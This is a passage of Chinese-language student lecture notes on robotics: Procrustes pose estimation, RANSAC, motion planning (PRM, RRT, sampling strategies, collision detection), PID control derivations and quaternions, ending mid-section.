$$ \begin{aligned} (\mathbf{AV})^{\top}\mathbf{U} &= \mathbf{I} \ \mathbf{AV} &= \mathbf{U} \ \mathbf{A} &= \mathbf{UV}^{\top} \end{aligned} $$

后处理

正交 Procrustes 问题的基本约束 $\mathbf{A}^{\top}\mathbf{A} = \mathbf{I}$ 保证了 $\mathbf{A}$ 是一个正交矩阵。但正交矩阵即可以是旋转($\det \mathbf{A} = +1$),也可以是 反射 (改变手性,$\det \mathbf{A} = -1$)

所以,如果计算出的 $\det(\mathbf{UV}^{\top}) = -1$,表明 $\mathbf{UV}^{\top}$ 是一个反射。为了得到最接近的纯旋转,我们通过修改 SVD 中间对角矩阵 $\mathbf{D}$ 的最后一个元素符号来 “翻转” 这个反射。具体做法就是将解修正为:

$$ \hat{\mathbf{A}} = \mathbf{U}\begin{pmatrix} 1 & 0 & 0 \ 0 & 1 & 0 \ 0 & 0 & \det(\mathbf{UV}^{\top}) \end{pmatrix}\mathbf{V}^{\top} $$

直观上,这代表选择翻转关联性最弱的方向,是因为这样做对整体对齐效果(即 Frobenius 范数或等价的迹最大化目标)的影响是最小的。

位移求解

可以想到,一旦旋转矩阵确定,那么位移向量 $t$ 就非常好解了(计算变换前后差值即可)。

将一个变换矩阵转换为刚才说的正交 Procrustes 问题,也只需要对两个原始点集 $\mathbf{M}$ 和 $\mathbf{N}$ 分别减去各自的几何中心即可。

步骤:

  1. 中心化

    • 计算两个点集的质心:$\overline{\mathbf{M}}$(M 的均值), $\overline{\mathbf{N}}$(N 的均值)。
    • 得到中心化后的点集:$\tilde{\mathbf{M}} = \mathbf{M} - \overline{\mathbf{M}}$, $\tilde{\mathbf{N}} = \mathbf{N} - \overline{\mathbf{N}}$。
  2. 求解旋转 $\hat{\mathbf{R}}$:对中心化后的点集 $\tilde{\mathbf{M}}$ 和 $\tilde{\mathbf{N}}$ 应用 带约束的正交 Procrustes 算法 (要求 $\det(\mathbf{R})=+1$),求解最优旋转 $\hat{\mathbf{R}}$,使得 $\tilde{\mathbf{M}}^{\top} \approx \hat{\mathbf{R}}\tilde{\mathbf{N}}^{\top}$。

  3. 求解平移 $\hat{\mathbf{T}}$:利用已求得的 $\hat{\mathbf{R}}$ 和原始点集的质心计算最优平移: $$ \hat{\mathbf{T}} = \overline{\mathbf{M}^{\top} - \hat{\mathbf{R}} \mathbf{N}^{\top}} $$

问题

草,刚上完的计算机视觉导论还在追我!

对于 Outlier 较为敏感,使用 RANSAC 算法即可。

以下内容直接摘录自 CV 导论笔记,看过的可以直接跳。

最小二乘法(Least Square Method)

定义:假设有一组数据点 $(x_i, y_i)$,我们希望通过直线 $y = mx + b$ 拟合这些点。

其能量函数(损失函数)为:

$$ E = \sum_{i=1}^n (y_i - mx_i - b)^2 $$

not_roboust_outliner

最小二乘法的一个问题是对细微噪声 鲁棒(robust),但是对于 离群点(Outliers) 敏感。如图,为了照顾一个离群点,整个直线发生了很大的旋转。

RANSAC(RANdom SAmple Consensus,随机抽样一致算法)

动机:我们想要一个自动化的算法,可以确定离群点(outliers)并排除之。

想法:我们希望找到一条直线,使得这条直线有最多的内点(inliner)。

RANSAC loop:假设这条直线需要 2 个点(或选择 $n$ 个点,但选择最少的 2 个点可以保证这些点中没有 outliers 的概率最大)来确定:

  1. 随机选择 $k$ 组能确定这条直线的点(即从所有点中选出一个 $k \times 2$ 的矩阵)。
  2. 对每一组点计算出一条直线(使用 SVD)。
  3. 对每一组点的直线,计算所有点到这条直线的距离;若距离小于阈值,则认为该点是这条直线的内点(inliner)。
  4. 找到内点数量最多的直线,若数量超过阈值,则认为这条直线是最优的。
  5. 对最优直线,用其所有内点重新计算一次直线。
  6. 重复上述步骤,直到内点数量不再增加。

注意:此过程可推广到 $n$ 维空间,只需选择 $\geq n$ 个点来确定一个 $n-1$ 维的超平面。

实际上,从今天的视角来看,此循环(loop)不再必需,因为我们可以并行地提出所有假设(Hypothesis),CV 导论中将此留作作业。

Instance level

对物体级别的位姿变换预测,要求每个物体都已知(完整建模),典型算法如 PoseCNN,如果结合 ICP 算法可以在位移幅度较小的情况下更快的提升准确率(下节课详细讲)。

posecnn_result

Catagory level

对同一类别物体的位姿变换预测,这类物品通常具有共有结构,如茶杯具有相近的几何形状,可以用于定位(下节课详细讲)。

在同类别物体中进行泛化,但也因此受限,没见过的类别不行。

大小不知道,能给出旋转 Rotation 不能给平移 Translation,因为可能沿着物体光轴走,还是那个鸽子为什么这么大的问题,所以 Catagory level 必须要知道大小。

why_pigeon_so_big_2

那么如何在同一类别物体的不同尺寸之间进行泛化呢,答案是类似归一化的想法,把同一类别的东西缩放到一个标准的 1x1x1 box 内,将其几何中心归一化到 box 中心,从而统一他们的尺度。

💾

机器人学 III

2025年3月12日 10:26

运动规划

配置空间(Configuration Space)

定义:机器人的所有可能关节状态构成的抽象空间,记为 $\mathcal{C}-\text{space}$。

  • Q 表示法:$Q = (q_1, q_2, \ldots, q_n)$,其中 $q_i$ 为第 $i$ 个关节的位置参数(如角度或位移)。
  • 自由空间(Free Space)$\mathcal{C}_{\text{free}}$:不与障碍物碰撞的合法配置集合。
  • 障碍空间(Obstacle Space)$\mathcal{C}_{\text{obs}}$:与障碍物发生碰撞的非法配置集合。

路径规划问题:在 $\mathcal{C}{\text{free}}$ 中寻找从起点 $Q{\text{start}}$ 到目标 $Q_{\text{goal}}$ 的连续路径。

挑战:避障、长程规划、高维空间规划

碰撞检测(Collision Detection)

基本挑战

问题定义:给定一个 $q_{\text{pose}}$,判断机械臂是否与环境发生碰撞(collision)。也即判断其是在 $\mathcal{C}{\text{free}}$ 中还是在 $\mathcal{C}{\text{obs}}$ 中。

几何复杂度:机械臂与环境的高精度三维模型(如三角网格 / 面片,mesh)直接检测碰撞计算量很大。

计算瓶颈:检测两个含 $10^5$ 三角面片的模型是否碰撞需 $O(10^{10})$ 次面片相交判断。

球体包裹法(Bounding Spheres)

思想:用球体序列近似机械臂连杆(如下图)。

bounding_spheres

碰撞检测公式:两球体中心 $\mathbf{p}_i, \mathbf{p}_j$ 满足 $|\mathbf{p}_i - \mathbf{p}_j| \leq (r_i + r_j)$ 时碰撞。

优缺点:

  • 优点:计算高效($O(n^2)$ 复杂度,$n$ 为球体数)。
  • 缺点:保守性导致可行解丢失,限制了模型对于更精细物体的操作能力
    • 你不能通过球体近似抓起来一个很小的面片
    • 球体近似还可能导致虚假自碰撞(self-collision,即不同连杆之间的碰撞)

凸包分解(Convex Decomposition)

思想:将凹几何体分解为多个凸包(Convex Hull),利用凸包相交检测算法加速。

原因:检测多个凸起来的物体之间是否发生碰撞是很很高效的(类似之前的球体近似),但是检测凸起来的物体和凹进去的物体之间是否发生碰撞是比较困难的。

分类:

  • 凸包(Convex-Hull):生成单一的凸网格,效率最高但精度较低。
  • 精确凸分解(Exact Convex Decomposition):属于 NP-hard 问题,不实用,因为会产生大量的聚类。
  • 近似凸分解(Approximate Convex Decomposition, ACD):确定网格三角形的划分,使用最少的聚类数量,同时确保每个聚类的凹度低于用户定义的阈值。

convex_hull_mesh_decomposition

优缺点:

  • 优势:比球体更精确,减少保守性误差。
  • 缺点:凹形物体的高效凸分解仍是几何处理中的待研究问题。

insight:问题做不出来不一定是自己的问题,也有可能是更底层的 simulation 有问题。

运动规划算法

问题定义:既然已经有了检测 $q_{\text{pose}}$ 是否与环境发生碰撞的算法,那么接下来的任务就是在 $\mathcal{C}{\text{free}}$ 中找到一条从 $Q{\text{start}}$ 到 $Q_{\text{goal}}$ 的路径(路径上所有点都在 $\mathcal{C}_{\text{free}}$ 中)。

局限性

运动规划具有局限性,因为有些情况我们是可以容忍的,但会被之排除。

比如,我们的操作是具有弹性的,如用手去抓东西,尽管手会变形,但不影响可行性,然而基于碰撞检测的方法会将解排除。

即便如此,运动规划算法仍然具有其价值,因为对于很多基础问题,基于模拟的采样效率优于去真实环境中采集数据(RL),这能提供大量可行的轨迹数据,从而为 RL 提供数据来源。

概率路图法(Probabilistic Roadmap, PRM)

步骤:

  1. 采样:在 $\mathcal{C}_{\text{free}}$ 中随机生成 $N$ 个配置点 ${Q_1, Q_2, \ldots, Q_N}$。通常会在 $\mathcal{C}-\text{space} \subset \mathbb{R}^n$ 中对各个维度进行均匀离散化,然后随机采样。

    注意,这里暗含了对 $\mathcal{C}-\text{space}$ 的均匀采样必然也是对 $\mathcal{C}_{\text{free}}$ 的均匀采样(因为概率密度函数 PDF 恒为常数)。

  2. 建图:连接邻近点形成图结构,剔除与 $\mathcal{C}_{\text{obs}}$ 碰撞的边。

  3. 查询:在图搜索(如 A* 算法)中寻找 $Q_{\text{start}}$ 到 $Q_{\text{goal}}$ 的路径。

特点:预计算路图可复用,适合多查询场景。

伪代码(注意符号 $N,n$ 的定义与上文有所出入):

$$ \begin{array}{l} \textbf{function} \ \text{概率路线图}(n, k, q_{start}, q_{goal}) \ \textbf{returns} \ \text{一条从起点到目标的路径} \ \quad \text{// 输入:} n: \text{路线图中采样节点的数量}, k: \text{为每个配置检查的最近邻居数量}, q_{start}, q_{goal} \ \quad V \leftarrow {q_{start}, q_{goal}} \ \quad E \leftarrow \varnothing \ \quad \textbf{while} \ |V| < n \ \textbf{do} \ \quad \quad \textbf{repeat} \ \quad \quad \quad q \leftarrow \text{在}\ C \ \text{中的一个随机配置} \ \quad \quad \textbf{until} \ q \ \text{在} \ C_{free} \ \text{中} \ \quad \quad V \leftarrow V \cup {q} \ \quad \textbf{end} \ \quad \textbf{for each} \ q \in V \ \textbf{do} \ \quad \quad N_q \leftarrow \text{根据距离函数从} \ V \ \text{中选择的} \ q \ \text{的} \ k \ \text{个最近邻居} \ \quad \quad \textbf{for each} \ q' \in N_q \ \textbf{do} \ \quad \quad \quad \textbf{if} \ (q, q') \notin E \ \text{and} \ (q, q') \in C_{free} \ \textbf{then} \ \quad \quad \quad \quad E \leftarrow E \cup {(q, q')} \ \quad \quad \quad \textbf{end} \ \quad \quad \textbf{end} \ \quad \textbf{end} \ \quad \textbf{return} \ \text{使用 Dijkstra 算法寻找从} \ q_{start} \ \text{到} \ q_{goal} \ \text{的路径} \ \end{array} $$

如何判断一条线是否全在 $\mathcal{C}{\text{free}}$ 中,即 $(q, q') \in C{free}$?

答:在其上线性采样一些点(可以采用二分法加快尝试效率),然后判断这些点是否在 $\mathcal{C}{\text{free}}$ 中。如果都是,则认为这条线全在 $\mathcal{C}{\text{free}}$ 中。如果有任何一个点不在 $\mathcal{C}{\text{free}}$ 中,则认为这条线不在 $\mathcal{C}{\text{free}}$ 中。

高斯采样

考虑如下情形:

rpm_not_applicable

在这种情况下,如果仍然使用均匀采样,那么狭窄路径由于所占面积比例较小,其中点被采样到的概率也会非常小,导致难以求解。

所以我们需要使用 高斯采样

  1. 首先均匀生成样本点:在配置空间中均匀随机生成一个样本点 $q_1$
  2. 高斯分布生成第二个点:以 $q_1$ 为均值,$\sigma^2$ 为方差,从高斯分布 $\mathcal{N}(q_1, \sigma^2)$ 中生成第二个样本点 $q_2$
  3. 筛选添加条件:如果 $q_1 \in C_{\text{free}}$ 且 $q_2 \notin C_{\text{free}}$,则添加 $q_1$ 到图中

高斯采样中节点 $q_2$ 由节点 $q_1$ 的高斯分布 $\mathcal{N}(q_1, \sigma^2)$ 生成,避免了在 C 空间中的多次插值和碰撞检测,提高了采样效率

  • 太大的 $\sigma$ 难以对狭窄通道采样
  • 太小的 $\sigma$ 采样效率不高,且得到的采样点距离障碍物太近,容易和障碍物发生碰撞。

uniform_vs_gaussian_sampling

可以看到,这么采样之后,我们得到的点大多会分布在自由空间的边界附近,也即 边界偏好。通过这种方法,我们可获取地图中的连通信息,有更大的概率找到关键通路。

但是这种方式的弊端在于其 采样效率也有可能会降低,我们可能需要采样更多的次数才能找到足够多的、满足条件的点。而且仍然存在冗余,如凹陷、障碍物转角区域的路标点。

桥采样

桥采样是高斯采样的一种变体:

  1. 均匀生成 $q_1$
  2. 从高斯分布 $\mathcal{N}(q_1, \sigma^2)$ 生成 $q_2$
  3. 计算中点 $q_3 = (q_1 + q_2) / 2$
  4. 当 $q_1, q_2 \in C_{\text{obs}}$ 而 $q_3 \in C_{\text{free}}$ 时,添加中点 $q_3$

bridge_sampling

这种采样方式更适合在狭窄通道处构建 “桥梁”,但是问题是非窄桥的地方采样会更少了。

总结

上述采样方法各有优劣,所以一般情况下,我们会结合这几种采样方法,从而尝试尽可能的提高获得可行解的概率。

PRM 更适合场景是静态的情况,因为它对空间的覆盖很好,而这种情况下,任意重新给定起点和终点(如果不在图中,我们找到其最近的点然后尝试建边),我们就可以很快得到新的路径。

但如果场景是动态的,那么我们需要重新构建路图,效率就会降低。

快速扩展随机树(Rapidly-exploring Random Tree, RRT)

步骤:

  1. 生长树:从 $Q_{\text{start}}$ 出发,向随机采样点扩展树分支。
  2. 目标偏置:以 $1 - \beta$ 的概率向 $Q_{\text{goal}}$ 方向尝试扩展树,以 $\beta$ 的概率向随机采样点扩展树。
  3. 终止条件:树分支到达 $Q_{\text{goal}}$ 邻域。

这里利用了一些 RL 中的思想,即 平衡探索与利用(exploration vs exploitation)。我们固然希望更快的找到目标,但是如果我们只向目标扩展,那么我们可能会错过一些更好的路径,甚至根本找不到路径。这就要求我们在其中寻得一个平衡。

这也是为什么我们在算法中引入了一个参数 $\beta$,它控制了我们向目标扩展的概率。

rrt_pathfinding_algorithm_diagram

伪代码:

$$ \begin{array}{l} \textbf{function} \ \text{RRT 扩展算法}(n, \epsilon, \beta, q_{start}, q_{goal}) \ \textbf{returns} \ \text{一条从起点到目标的路径} \ \quad \text{// 输入:} n: \text{树中采样节点的数量}, \epsilon: \text{步长}, \beta: \text{采样目标点的概率}, q_{start}, q_{goal} \ \quad V \leftarrow {q_{start}} \ \quad E \leftarrow \varnothing \ \quad \textbf{for} \ i = 1 \rightarrow n \ \textbf{do} \ \quad \quad \textbf{if} \ rand(0, 1) < \beta \ \textbf{then} \ \quad \quad \quad q_{target} \leftarrow q_{goal} \ \quad \quad \textbf{else} \ \quad \quad \quad q_{target} \leftarrow \text{从} \ C_{free} \ \text{中均匀随机采样} \ \quad \quad \textbf{end} \ \quad \quad q_{near} \leftarrow \text{V 中离} \ q_{target} \ \text{最近的邻居} \ \quad \quad q_{new} \leftarrow q_{near} + \frac{\epsilon}{|q_{near}-q_{target}|}(q_{target} - q_{near}) \ \quad \quad \textbf{if} \ q_{new} \notin V \ \text{and} \ q_{new} \in C_{free} \ \text{and} \ (q_{near}, q_{new}) \in C_{free} \ \textbf{then} \ \quad \quad \quad V \leftarrow V \cup {q_{new}} \ \quad \quad \quad E \leftarrow E \cup {(q_{near}, q_{new})} \ \quad \quad \textbf{end} \ \quad \textbf{end} \ \quad \textbf{return} \ \text{使用 Dijkstra 算法寻找从} \ q_{start} \ \text{到} \ q_{goal} \ \text{的路径} \ \end{array} $$

RRT 方法需要根据问题和经验进行参数调节,这包括探索参数 $\beta$、步长 $\epsilon$ 和采样点数量 $n$。

  • 较大的 $\epsilon$:
    • 优点:加快树的扩展速度
    • 缺点:可能会跳过狭窄通道,导致路径不可行,导致难以在复杂环境中生成有效的新样本
  • 较小的 $\epsilon$:
    • 优点:更精确地探索空间
    • 缺点:扩展速度慢,生成大量的节点增加计算负担,增加迭代次数

RRT-Connect

RRT-Connect 是对基本 RRT 算法的一种改进,具有以下特点:

  1. 双向树生长:同时从起点 $q_{start}$ 和目标点 $q_{goal}$ 分别生长两棵树,而不是只从起点生长一棵树,这样可以加快搜索效率。
  2. 定向生长策略:让两棵树相向生长,每棵树扩展的目标会选择另一棵树最近更新的叶子节点而不是根节点,这大大提高了两棵树相连接的效率
  3. 贪婪扩展:使用多种 $\epsilon$ 步长进行更贪婪的树扩展,而不是单步扩展,加速树的生长速度

这种双向搜索策略显著提高了路径规划的效率,尤其是在复杂环境中。

捷径算法(Shortcutting)

RRT 和 RRT-Connect 不是渐近最优的(即使采样无限多,也不能保证找到最优路径)

  • PRM(概率路线图)算法具有渐近最优性,但需要海量采样才能实现
  • PRM 和 RRT 常产生不自然的 "抖动" 路径(下图图 1),缺乏平滑性

shortcutting

捷径算法:通过直接连接路径上不相邻的点(如果连线在自由空间中),尝试消除不必要的弯路,是一种已经得到了可行路径的后处理方法。

多次重启

单次 RRT 之后多次 Shortcutting,效果不一定会变好,因为这可能仅仅是平滑了一下路径,但是没有根本性地优化掉冗余的主干路径。

所以,我们可以尝试多次 RRT,并对多条可行路径并行地进行优化(即 Shortcutting),然后再从中选择最优的路径,从而规避局部最优解。

比如下面这张图,实际上上面存在更优解,但是单次 RRT/RRT-Connect 找到的是下面的次优解。这种情况下单纯使用 Shortcutting 是无效的。

shortcutting_not_applicable

控制系统

控制系统的核心目标

在机器人系统中,控制论的核心任务是 将已知的理想行为完美执行。而控制系统本质是对一些你不知道、无法避免的 error 进行一种反馈。因为现实不存在说到做到,总是会有误差的存在。

开环与闭环控制

开环控制(Feedforward, FF):直接执行预设动作,认为 FK(前向运动学)是没有误差的,所以它依赖精确建模但缺乏误差修正能力。

简而言之:就像闭着眼睛做事一样

  • 不使用状态估计器,即不会估计系统当前的真实状态
  • 没有反馈机制,因此容易受到噪声和外部干扰影响
  • 依靠 预先设定 的启发式方法来尝试达到目标状态

ff

闭环控制(Feedback, FB):引入实时反馈,构建反馈回路。

  • 能够有效地达到并维持期望状态
  • 可以主动抵抗外部干扰的影响,稳定本来不稳定的系统

fb

控制系统的性能评价

我们总是希望能够尽快达到理想状态并保持在该状态。

  • 最小化稳态(Steady-State)误差
  • 最小化调节时间,快速达到稳态
  • 最小化稳态附近的振荡

性能评价指标

首先,定义误差函数(Error Function):

  • 期望状态:$\theta_d$(destination)
  • 当前状态:$\theta$
  • 误差:$\theta_e = \theta_d - \theta$

然后,就可以定义性能评价指标:

  1. 稳态误差(Steady-State Error):表示系统到达稳态后的残余误差

    $$ e_{ss} = \lim_{t\to\infty} \theta_e(t) $$

    理想系统应满足 $e_{ss}=0$

  2. 调节时间(Settling Time):误差首次进入并保持在 $\pm 2%$ 误差带所需时间

  3. 超调量(Overshoot):系统响应超过稳态值的程度,最开始过去不算 $$ \text{overshoot} = |a/b| \times 100% $$ 其中,$a$ 表示最大偏移量,$b$ 表示最终稳态值

performance_evaluation_metrics

P 控制(Proportional Control)

在控制系统中,P 控制是将错误信号转换为命令的基本方法,控制信号与误差大小成正比。

  • $\theta(t)$:$t$ 时刻系统实际状态
  • $\theta_d(t)$:期望状态(目标状态)
  • $\theta_e(t)$:误差状态,$\theta_e(t) = \theta_d(t) - \theta(t)$
  • $K_p$:比例系数

比例控制的基本表达式

$$ P = K_p\theta_e(t) $$

一阶形式

当控制信号改变状态的导数(即控制速度信号)时:

$$ \dot{\theta}(t) = P = K_p\theta_e(t) $$

根据误差定义和状态导数关系:

$$ \theta_e(t) = \theta_d(t) - \theta(t) \ \dot{\theta}_e(t) = \dot{\theta}_d(t) - \dot{\theta}(t) $$

将控制方程代入:

$$ \dot{\theta}_e(t) = \dot{\theta}_d(t) - K_p\theta_e(t) $$

如果期望状态以恒定速度移动:

$$ \dot{\theta}_d(t) = c $$

则误差动态方程为:

$$ \dot{\theta}_e(t) + K_p\theta_e(t) = c $$

首先求解特征方程:

$$ \dot{\theta}_e(t) + K_p\theta_e(t) = 0 $$

求解过程(以防有同学已经忘光了 ODE):

$$ \begin{aligned} \dot{\theta}_e(t) &= -K_p\theta_e(t) \ \frac{\mathrm{d}\theta_e(t)}{\mathrm{d}t} &= -K_p\theta_e(t) \ \frac{\mathrm{d}\theta_e(t)}{\theta_e(t)} &= -K_p \mathrm{d}t \ \int \frac{\mathrm{d}\theta_e(t)}{\theta_e(t)} &= -K_p \int \mathrm{d}t \ \ln|\theta_e(t)| &= -K_p t + C_1 \ |\theta_e(t)| &= e^{-K_p t + C_1} = e^{C_1} \cdot e^{-K_p t} \ C &= e^{C_1} \ |\theta_e(t)| &= C \cdot e^{-K_p t} \ \end{aligned} $$

得到齐次方程的通解:

$$ \theta_e(t) = Ce^{-K_pt} $$

其中 $C$ 为常数。

然后观察原始方程,容易发现特解:

$$ \theta_{A} = \frac{c}{K_p} $$

所以通解为:

$$ \theta_e(t) = \frac{c}{K_p} + Ce^{-K_pt} $$

应用初始条件 $\theta_e(0)$ 确定常数 $C$:

$$ \theta_e(0) = C + \frac{c}{K_p} \Rightarrow C = \theta_e(0) - \frac{c}{K_p} $$

最终,我们得到:

$$ \theta_e(t) = \frac{c}{K_p} + \left(\theta_e(0) - \frac{c}{K_p}\right)e^{-K_pt} $$

结论分析

  1. 当 $c=0$(目标静止)时:

    $$ \theta_e(t) = \theta_e(0)e^{-K_pt} $$

    误差呈指数衰减至零,系统最终收敛到目标状态。

  2. 当 $c\neq0$(目标移动)时:

    • 随着 $t\rightarrow\infty$,$e^{-K_pt}\rightarrow0$
    • 稳态误差:$\lim_{t\rightarrow\infty}\theta_e(t) = \frac{c}{K_p}$
    • 系统存在永久稳态误差,误差大小与目标速度 $c$ 成正比,与比例增益 $K_p$ 成反比,所以增大 $K_p$ 可以减小稳态误差

二阶形式

如果控制信号改变状态的二阶导数(力或力矩信号):

$$ \ddot{\theta}(t) = P = K_p\theta_e(t) $$

则会导致状态振荡且不稳定。

PI 控制(Proportional-Integral Control)

PI 控制结合了比例控制和积分控制:

$$ PI = K_p \theta_e(t) + K_i \int_0^t \theta_e(\tau) \mathrm{d}\tau $$

其中:

  • $K_p$:比例系数
  • $K_i$:积分系数
  • $\theta_e(t)$:误差

如果控制信号作用于状态导数(如速度信号):

$$ \dot{\theta}(t) = PI = K_p \theta_e(t) + K_i \int_0^t \theta_e(\tau) \mathrm{d}\tau $$

定义误差导数 $\dot{\theta}_e(t) = \dot{\theta}_d(t) - \dot{\theta}(t)$,也即 $\dot{\theta}_d(t) = \dot{\theta}_e(t) + \dot{\theta}(t)$,两边求导得到:

$$ \ddot{\theta}_d(t) = \ddot{\theta}_e(t) + K_p \dot{\theta}_e(t) + K_i \theta_e(t) $$

如果 $\ddot{\theta}_d(t) = 0$(目标加速度为零),动态方程化为:

$$ \ddot{\theta}_e(t) + K_p \dot{\theta}_e(t) + K_i \theta_e(t) = 0 $$

这是一个二阶常系数齐次微分方程。

PPT 上没有,回忆一下高数:

对于齐次线性常系数二阶微分方程:

$$ y'' + py' + qy = 0, $$

其特征方程为:

$$ \lambda^2 + p\lambda + q = 0, $$

特征根 $\lambda_1, \lambda_2$ 的不同情况对应微分方程的通解如下:

  1. 两相异实根 $\lambda_1, \lambda_2$:

    $$ y = C_1 e^{\lambda_1 x} + C_2 e^{\lambda_2 x}. $$

  2. 二重根 $\lambda_1$:

    $$ y = (C_1 + C_2 x)e^{\lambda_1 x}. $$

  3. 共轭复根 $\lambda_{1,2} = a \pm i\beta$: $$ y = e^{ax}(C_1 \cos \beta x + C_2 \sin \beta x). $$

解的形式由方程特征根决定,特征方程为:

$$ r^2 + K_p r + K_i = 0 $$

其解的形式决定系统的阻尼特性:

  1. 过阻尼 (Overdamped,下图 I):两个实根,系统缓慢收敛。
  2. 临界阻尼 (Critically damped,下图 II):双重实根,快速无振荡收敛。
  3. 欠阻尼 (Underdamped,下图 III):共轭复根,系统振荡收敛。

overdamped_critical_underdamped

P 控制与 PI 控制比较

  1. P 控制

    • 仅能消除静态误差(目标静止时)。
    • 对于目标移动(如恒定速度),存在稳态误差,在下图中,可以看到 P 控制没有最后和 $\theta$ 存在一个恒定差距,$\theta_e \to c \neq 0$
  2. PI 控制

    • 通过积分项消除稳态误差,在下图中,可以看到 PI 控制没有最后可以和 $\theta$ 重合,$\theta_e \to 0$
    • 对恒定速度目标控制效果更好(可以消除稳态误差),但对复杂轨迹不能完全消除。

pi_vs_p_control

PI 控制通过引入积分项,解决了 P 控制中的稳态误差问题,但会引入更多复杂性(如可能的振荡)。调整 $K_p$ 和 $K_i$ 的值可改变系统性能,如响应速度和稳定性。

PD 控制(Proportional-Derivative Control)

PD 控制结合了比例控制和微分控制:

$$ PD = K_p \theta_e(t) + K_d \frac{\mathrm{d}}{\mathrm{d}t}\theta_e(t) $$

其中:

  • $K_p$:比例系数
  • $K_d$:微分系数
  • $\theta_e(t)$:误差
  • $\frac{\mathrm{d}}{\mathrm{d}t}\theta_e(t)$:误差变化率

根据误差定义 $\theta_e(t) = \theta_d(t) - \theta(t)$,可得:

$$ \ddot{\theta}_e(t) = \ddot{\theta}_d(t) - \ddot{\theta}(t) $$

将误差加速度表达式代入控制方程:

$$ \ddot{\theta}_e(t) = K_p \theta_e(t) + K_d \dot{\theta}_e(t) $$

重新整理得到:

$$ \ddot{\theta}_e(t) + K_d \dot{\theta}_e(t) + K_p \theta_e(t) = \ddot{\theta}_d(t) $$

如果 $\ddot{\theta}_d(t) = 0$(目标加速度为零),动态方程简化为:

$$ \ddot{\theta}_e(t) + K_d \dot{\theta}_e(t) + K_p \theta_e(t) = 0 $$

后续类似 PI 控制,但 $K_p$ 位置有所改变。

解的形式由方程特征根决定,特征方程为:

$$ r^2 + K_d r + K_p = 0 $$

根据特征根的性质,系统表现出不同的动态行为:

  1. 过阻尼:两个实根,系统无振荡地缓慢收敛。
  2. 临界阻尼:二重实根,系统以最快速度无振荡收敛。
  3. 欠阻尼:一对共轭复根,系统呈振荡收敛状态。

PID 控制(Proportional-Integral-Derivative Control)

PID 控制结合了 P、I、D 三种控制方式:

$$ PID = K_p \theta_e(t) + K_i \int_0^t \theta_e(\tau)\mathrm{d}\tau + K_d \frac{\mathrm{d}}{\mathrm{d}t}\theta_e(t) $$

比例项(Proportional)

$K_p$ 控制当前状态

$$ u_P(t) = K_p \theta_e(t) $$

  • $K_p$ 增大可 加快响应速度,因为我们会更希望快速减少 $\theta_e(t)$
  • 单独使用会产生稳态误差(P 控制),如机械臂关节受摩擦力时无法完全归零

积分项(Integral)

$K_i$ 控制历史累积

$$ u_I(t) = K_i \int_0^t \theta_e(\tau)\mathrm{d}\tau $$

  • 对持续误差进行累积补偿,消除稳态误差

微分项(Derivative)

$K_d$ 预测未来趋势

$$ u_D(t) = K_d \frac{\mathrm{d}}{\mathrm{d}t}\theta_e(t) $$

  • 与误差的变化率成正比,抑制超调和振荡
  • 当误差增加时提供更强的控制作用
  • 当误差减小时提供更温和的控制作用

总结

调高各个系数的影响:

| 参数(Parameter) | 上升时间(Rise time) | 超调量(Overshoot) | 调节时间(Settling time) | 稳态误差(Steady-state error) | 稳定性(Stability) | | ----------------- | --------------------- | ------------------- | ------------------------- | ------------------------------ | ------------------- | | $K_p$ | 减小 | 增大 | 小变化 | 减小 | 变差 | | $K_i$ | 减小 | 增大 | 增加 | 消除 | 变差 | | $K_d$ | 小变化 | 减小 | 减小 | 理论上无影响 | 如果 $K_d$ 小则改善 |

仿真实现

$$ \text{force} = \text{stiffness} * (\text{targetPosition} - \text{Position}) + \text{damping} *((\text{targetVelocity} - \text{Velocity})) $$

  • Stiffness(刚度) 类似于 $k_p$ (比例增益),用于调整位置误差的影响。
  • Damping(阻尼) 类似于 $k_d$ (微分增益),用于调整速度误差的影响。

💾

机器人学 II

2025年3月5日 17:53

四元数

[!TIP]

强烈推荐参考 Krasjet / Quaternion 以获得直观且详细的性质证明推导。

小小的吐槽:王老师上节课明明刚说四元数不重要不要求掌握,结果这节课花了绝大部分时间来推导 hhh。

定义

四元数是复数的推广,表示为:

$$ q = w + xi + yj + zk $$

其中:

  • $w$ 是实数部分;
  • $x, y, z$ 是虚数部分;

$i, j, k$ 是虚数单位,满足以下关系:

$$ i^2 = j^2 = k^2 = ijk = -1 $$

反交换性质:

$$ ij = k = -ji, \quad jk = i = -kj, \quad ki = j = -ik $$

向量形式

$$ q = (w, \bold{v}), \quad \bold{v} = (x, y, z) $$

运算性质

乘法:对于两个四元数 $q_1 = (w_1, \bold{v}_1)$ 和 $q_2 = (w_2, \bold{v}_2)$,其乘法定义为:

$$ \begin{aligned} q_1 q_2 &= (w_1 w_2 - \bold{v}_1^{\top} \bold{v}_2, , w_1 \bold{v}_2 + w_2 \bold{v}_1 + \bold{v}_1 \times \bold{v}_2) \ &= (w_1 w_2 - \bold{v}_1 \cdot \bold{v}_2, , w_1 \bold{v}_2 + w_2 \bold{v}_1 + \bold{v}_1 \times \bold{v}_2) \end{aligned} $$

这被称为 Graßmann 积。

注意:四元数的乘法 不可交换,即 $q_1 q_2 \neq q_2 q_1$。

共轭

$$ q^* = (w, -\bold{v}) $$

模长

$$ |q|^2 = w^2 + \bold{v}^{\top} \bold{v} = qq^* = q^*q $$

$$ q^{-1} = \frac{q^*}{|q|^2} $$

这是模长的直接推论。

几何意义与应用

单位四元数:若四元数的模长为 $1$,即 $|q| = 1$,则称其为单位四元数。单位四元数可表示三维空间中的旋转。其还具有性质 $q^{-1} = q^*$。

纯四元数:若四元数的实部为 $0$,即 $q = (0, \bold{v})$,则称其为纯四元数。纯四元数可以表示三维空间中的向量。

旋转表示:任何一个旋转,都可以表示为绕某个单位向量 $\hat{\omega}$ 旋转 $\theta$ 角度(证明见后)。

那么,对应的四元数可以表示为:

$$ q = \left[\cos\frac{\theta}{2}, \sin\frac{\theta}{2} \hat{\omega}\right] $$

注意,旋转到四元数存在 “双重覆盖” 关系,我们可以很容易地发现:

$$ \begin{aligned} q &= \left[\cos\frac{\theta}{2}, \sin\frac{\theta}{2} \hat{\omega}\right] \ -q &= \left[-\cos\frac{\theta}{2}, -\sin\frac{\theta}{2}\hat{\omega}\right] \ &= \left[\cos(\pi - \frac{\theta}{2}), \sin(\pi - \frac{\theta}{2}) (-\hat{\omega})\right] \end{aligned} $$

是等价的($-q$ 意味着同一旋转轴但是翻转正方向,然后旋转 $2\pi - \theta$)。

double_coverage

相应地,从四元数恢复轴角表示:

